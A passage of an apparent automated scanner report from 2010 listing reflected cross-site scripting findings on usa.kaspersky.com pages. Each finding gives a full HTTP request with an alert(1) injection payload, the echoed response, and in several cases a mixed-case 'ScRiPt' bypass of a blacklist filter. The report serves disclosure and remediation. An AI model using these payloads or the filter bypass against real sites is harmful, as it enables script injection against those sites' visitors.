ETag: "1292685936"
Content-Type: text/html; charset=utf-8
Content-Length: 32070
Date: Sat, 18 Dec 2010 15:25:40 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/about-uscd464"-alert(1)-"fccdc794098/press-center";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.12. http://usa.kaspersky.com/about-us/press-center [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /about-us/press-center

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 974e4"-alert(1)-"4ad67da4ff2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about-us/press-center974e4"-alert(1)-"4ad67da4ff2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:27:01 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686021"
Content-Type: text/html; charset=utf-8
Content-Length: 32123
Date: Sat, 18 Dec 2010 15:27:08 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
= " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/about-us/press-center974e4"-alert(1)-"4ad67da4ff2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.13. http://usa.kaspersky.com/about-us/press-center [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /about-us/press-center

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e930"><ScRiPt>alert(1)</ScRiPt>4545945328e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /about-us/press-center2e930"><ScRiPt>alert(1)</ScRiPt>4545945328e HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:26:45 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686005"
Content-Type: text/html; charset=utf-8
Content-Length: 30239
Date: Sat, 18 Dec 2010 15:26:49 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us/press-center2e930"><ScRiPt>alert(1)</ScRiPt>4545945328e" />
...[SNIP]...

1.14. http://usa.kaspersky.com/about-us/press-center [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /about-us/press-center

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ddcc"><script>alert(1)</script>783f57d6e5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-us/press-center?6ddcc"><script>alert(1)</script>783f57d6e5b=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:23:06 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685786"
Content-Type: text/html; charset=utf-8
Content-Length: 52210
Date: Sat, 18 Dec 2010 15:23:21 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us/press-center?6ddcc"><script>alert(1)</script>783f57d6e5b=1" />
...[SNIP]...

1.15. http://usa.kaspersky.com/about-us/virus-analysts [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /about-us/virus-analysts

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4fec"><script>alert(1)</script>d6539064b42 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-usb4fec"><script>alert(1)</script>d6539064b42/virus-analysts HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:25:05 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685905"
Content-Type: text/html; charset=utf-8
Content-Length: 30187
Date: Sat, 18 Dec 2010 15:25:07 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-usb4fec"><script>alert(1)</script>d6539064b42/virus-analysts" />
...[SNIP]...

1.16. http://usa.kaspersky.com/about-us/virus-analysts [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /about-us/virus-analysts

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 242e6"-alert(1)-"d4ed3a1efc0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about-us/virus-analysts242e6"-alert(1)-"d4ed3a1efc0 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:27:19 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686039"
Content-Type: text/html; charset=utf-8
Content-Length: 32185
Date: Sat, 18 Dec 2010 15:27:24 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
" Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/about-us/virus-analysts242e6"-alert(1)-"d4ed3a1efc0";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.17. http://usa.kaspersky.com/about-us/virus-analysts [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /about-us/virus-analysts

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6ea4"><ScRiPt>alert(1)</ScRiPt>d1506e64186 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /about-us/virus-analystsc6ea4"><ScRiPt>alert(1)</ScRiPt>d1506e64186 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:27:01 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686021"
Content-Type: text/html; charset=utf-8
Content-Length: 30251
Date: Sat, 18 Dec 2010 15:27:07 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us/virus-analystsc6ea4"><ScRiPt>alert(1)</ScRiPt>d1506e64186" />
...[SNIP]...

1.18. http://usa.kaspersky.com/about-us/virus-analysts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /about-us/virus-analysts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a042"><script>alert(1)</script>82e10e3e260 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-us/virus-analysts?9a042"><script>alert(1)</script>82e10e3e260=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:23:22 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685802"
Content-Type: text/html; charset=utf-8
Content-Length: 51298
Date: Sat, 18 Dec 2010 15:23:35 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us/virus-analysts?9a042"><script>alert(1)</script>82e10e3e260=1" />
...[SNIP]...

1.19. http://usa.kaspersky.com/about-us/why-kaspersky [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /about-us/why-kaspersky

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2bf9"><script>alert(1)</script>40ebb2a70ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-usf2bf9"><script>alert(1)</script>40ebb2a70ff/why-kaspersky HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:26:40 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686000"
Content-Type: text/html; charset=utf-8
Content-Length: 30181
Date: Sat, 18 Dec 2010 15:26:46 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-usf2bf9"><script>alert(1)</script>40ebb2a70ff/why-kaspersky" />
...[SNIP]...

1.20. http://usa.kaspersky.com/about-us/why-kaspersky [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /about-us/why-kaspersky

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15b20"-alert(1)-"b352f5d490 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about-us15b20"-alert(1)-"b352f5d490/why-kaspersky HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:26:54 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686014"
Content-Type: text/html; charset=utf-8
Content-Length: 30078
Date: Sat, 18 Dec 2010 15:27:01 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/about-us15b20"-alert(1)-"b352f5d490/why-kaspersky";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.21. http://usa.kaspersky.com/about-us/why-kaspersky [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /about-us/why-kaspersky

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58237"-alert(1)-"791ee6324f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about-us/why-kaspersky58237"-alert(1)-"791ee6324f2 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:28:16 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686096"
Content-Type: text/html; charset=utf-8
Content-Length: 30148
Date: Sat, 18 Dec 2010 15:28:37 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
= " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/about-us/why-kaspersky58237"-alert(1)-"791ee6324f2";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.22. http://usa.kaspersky.com/about-us/why-kaspersky [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /about-us/why-kaspersky

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a553c"><script>alert(1)</script>d8b29f608f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-us/why-kasperskya553c"><script>alert(1)</script>d8b29f608f1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:27:59 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686079"
Content-Type: text/html; charset=utf-8
Content-Length: 30245
Date: Sat, 18 Dec 2010 15:28:02 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us/why-kasperskya553c"><script>alert(1)</script>d8b29f608f1" />
...[SNIP]...

1.23. http://usa.kaspersky.com/about-us/why-kaspersky [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /about-us/why-kaspersky

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa92b"><script>alert(1)</script>d6d22a9b174 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about-us/why-kaspersky?aa92b"><script>alert(1)</script>d6d22a9b174=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:25:27 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292685927"
Content-Type: text/html; charset=utf-8
Content-Length: 34307
Date: Sat, 18 Dec 2010 15:25:32 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/about-us/why-kaspersky?aa92b"><script>alert(1)</script>d6d22a9b174=1" />
...[SNIP]...

1.24. http://usa.kaspersky.com/category/page-variables-sprop1/downloads [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /category/page-variables-sprop1/downloads

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c506"-alert(1)-"29a4b80ccc8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category1c506"-alert(1)-"29a4b80ccc8/page-variables-sprop1/downloads HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:29:11 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686151"
Content-Type: text/html; charset=utf-8
Content-Length: 30192
Date: Sat, 18 Dec 2010 15:29:16 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
